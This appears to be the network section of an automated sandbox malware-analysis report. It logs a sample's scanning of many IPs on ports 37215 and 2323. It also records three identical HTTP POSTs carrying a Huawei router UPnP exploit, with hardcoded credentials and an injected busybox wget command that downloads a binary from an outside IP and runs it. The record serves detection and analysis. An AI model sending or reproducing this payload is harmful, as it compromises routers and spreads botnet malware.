      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.240.86.17:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.243.232.28:37215
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 159.127.70.7:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 157.239.88.10:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 80.192.227.228:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 168.156.10.144:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 37.214.106.39:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 69.13.246.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 147.50.129.255:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 220.172.93.199:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 116.130.239.23:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 194.154.218.36:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 122.244.223.92:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 97.136.86.222:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 59.111.207.143:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 53.245.147.183:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 185.3.28.207:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 83.110.159.223:2323
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 222.152.153.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 94.252.250.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 80.120.167.73:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.234.212.55:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 202.58.238.201:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 175.78.206.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.11.67.129:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.28.165.54:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.198.227.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 19.78.162.5:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.36.230.88:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.244.239.131:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.143.12.42:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 8.81.85.227:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.135.123.15:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.118.5.108:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.105.184.97:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.184.90.97:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.120.192.239:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.201.253.144:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.6.128.12:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.37.22.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.248.130.164:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 193.111.52.71:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 57.27.69.249:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.219.90.55:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.157.210.207:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 133.227.109.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.45.7.174:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 173.251.233.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 119.125.161.168:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.90.234.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.65.107.128:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 211.101.167.39:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 164.198.74.35:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 60.72.138.139:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.92.181.103:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.232.165.51:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.164.116.53:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.189.6.49:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 96.176.155.16:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.120.59.5:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.190.56.15:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.224.91.112:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.145.5.206:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.18.35.200:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.148.172.75:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.220.251.218:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.50.105.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.36.136.81:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.149.185.86:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.32.235.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.129.42.137:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.210.76.62:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.199.114.238:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 131.126.166.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 179.95.38.49:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.147.20.199:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.8.52.20:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.97.138.119:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 160.4.125.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 142.45.24.133:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.230.110.41:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.159.187.200:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.15.241.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.1.126.71:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.86.248.201:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 141.38.129.46:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.121.150.228:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.134.179.219:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.198.226.219:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 52.152.250.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.35.94.109:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.181.128.177:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.174.224.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.8.168.4:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.177.36.88:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.227.147.132:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.22.141.231:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.143.122.180:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.253.52.172:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.210.162.117:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.161.224.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.238.134.16:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.233.121.12:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.217.32.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.150.215.197:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.163.89.138:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.129.153.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.164.48.170:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 2.196.51.31:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.190.4.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 111.98.152.63:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.209.3.95:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.32.234.208:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.57.113.236:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.115.128.147:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 131.97.204.174:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 189.227.161.156:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 109.145.71.165:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.132.198.115:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.194.181.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.92.187.16:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 83.158.9.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 37.78.89.120:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 78.181.55.156:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.244.185.22:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 88.190.243.235:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.210.96.49:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 17.132.179.6:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.87.28.92:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 118.183.17.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.196.19.115:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.204.2.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.42.220.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.130.8.32:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.203.1.191:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.76.145.163:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 18.251.22.181:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.207.17.42:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.120.235.100:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.178.186.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.154.188.41:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 125.82.65.173:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 221.18.76.35:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.149.79.86:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.167.139.23:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.196.4.125:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.225.174.44:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.226.129.160:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.0.163.219:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.31.126.129:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 5.31.33.128:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.199.175.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.11.99.172:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.14.99.173:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.234.189.164:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.159.47.250:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.214.67.51:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.215.132.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 95.210.36.205:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.119.114.217:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.67.146.175:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.90.114.11:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 132.63.250.172:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.137.205.161:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.110.34.192:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 35.164.242.97:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 212.107.27.141:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.221.69.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.106.193.91:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 118.67.76.212:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.234.115.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.98.63.126:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.164.139.39:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.240.80.189:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.54.233.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.42.123.41:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.72.236.35:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.244.123.81:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 184.247.16.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 48.55.140.7:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.98.221.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.55.168.108:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.159.154.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.149.207.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 167.80.53.60:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.108.76.6:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.100.208.140:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.40.88.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.211.48.130:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.59.103.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.155.90.221:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 87.47.142.86:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 84.78.57.32:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.109.148.108:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.74.44.89:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.56.0.64:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 180.76.19.159:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.94.61.243:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.169.142.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 52.64.152.156:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.62.16.185:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.229.120.92:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.158.227.39:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.186.26.185:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.96.39.229:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.206.202.158:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.143.235.71:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.119.117.236:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.50.231.239:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 5.201.10.245:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.53.193.54:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.93.156.91:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.133.118.235:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.20.214.140:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.81.48.2:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.60.212.42:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.239.179.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.43.180.154:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.53.12.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 75.240.47.32:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.206.130.90:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.32.214.176:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.79.97.251:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 13.174.14.112:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.59.182.107:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.249.92.241:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.223.24.124:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 68.167.132.64:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.88.2.173:37215
      Source: global trafficHTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1Host: daisy.ubuntu.comAccept: */*Content-Type: application/octet-streamX-Whoopsie-Version: 0.2.69ubuntu0.3Content-Length: 164887Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
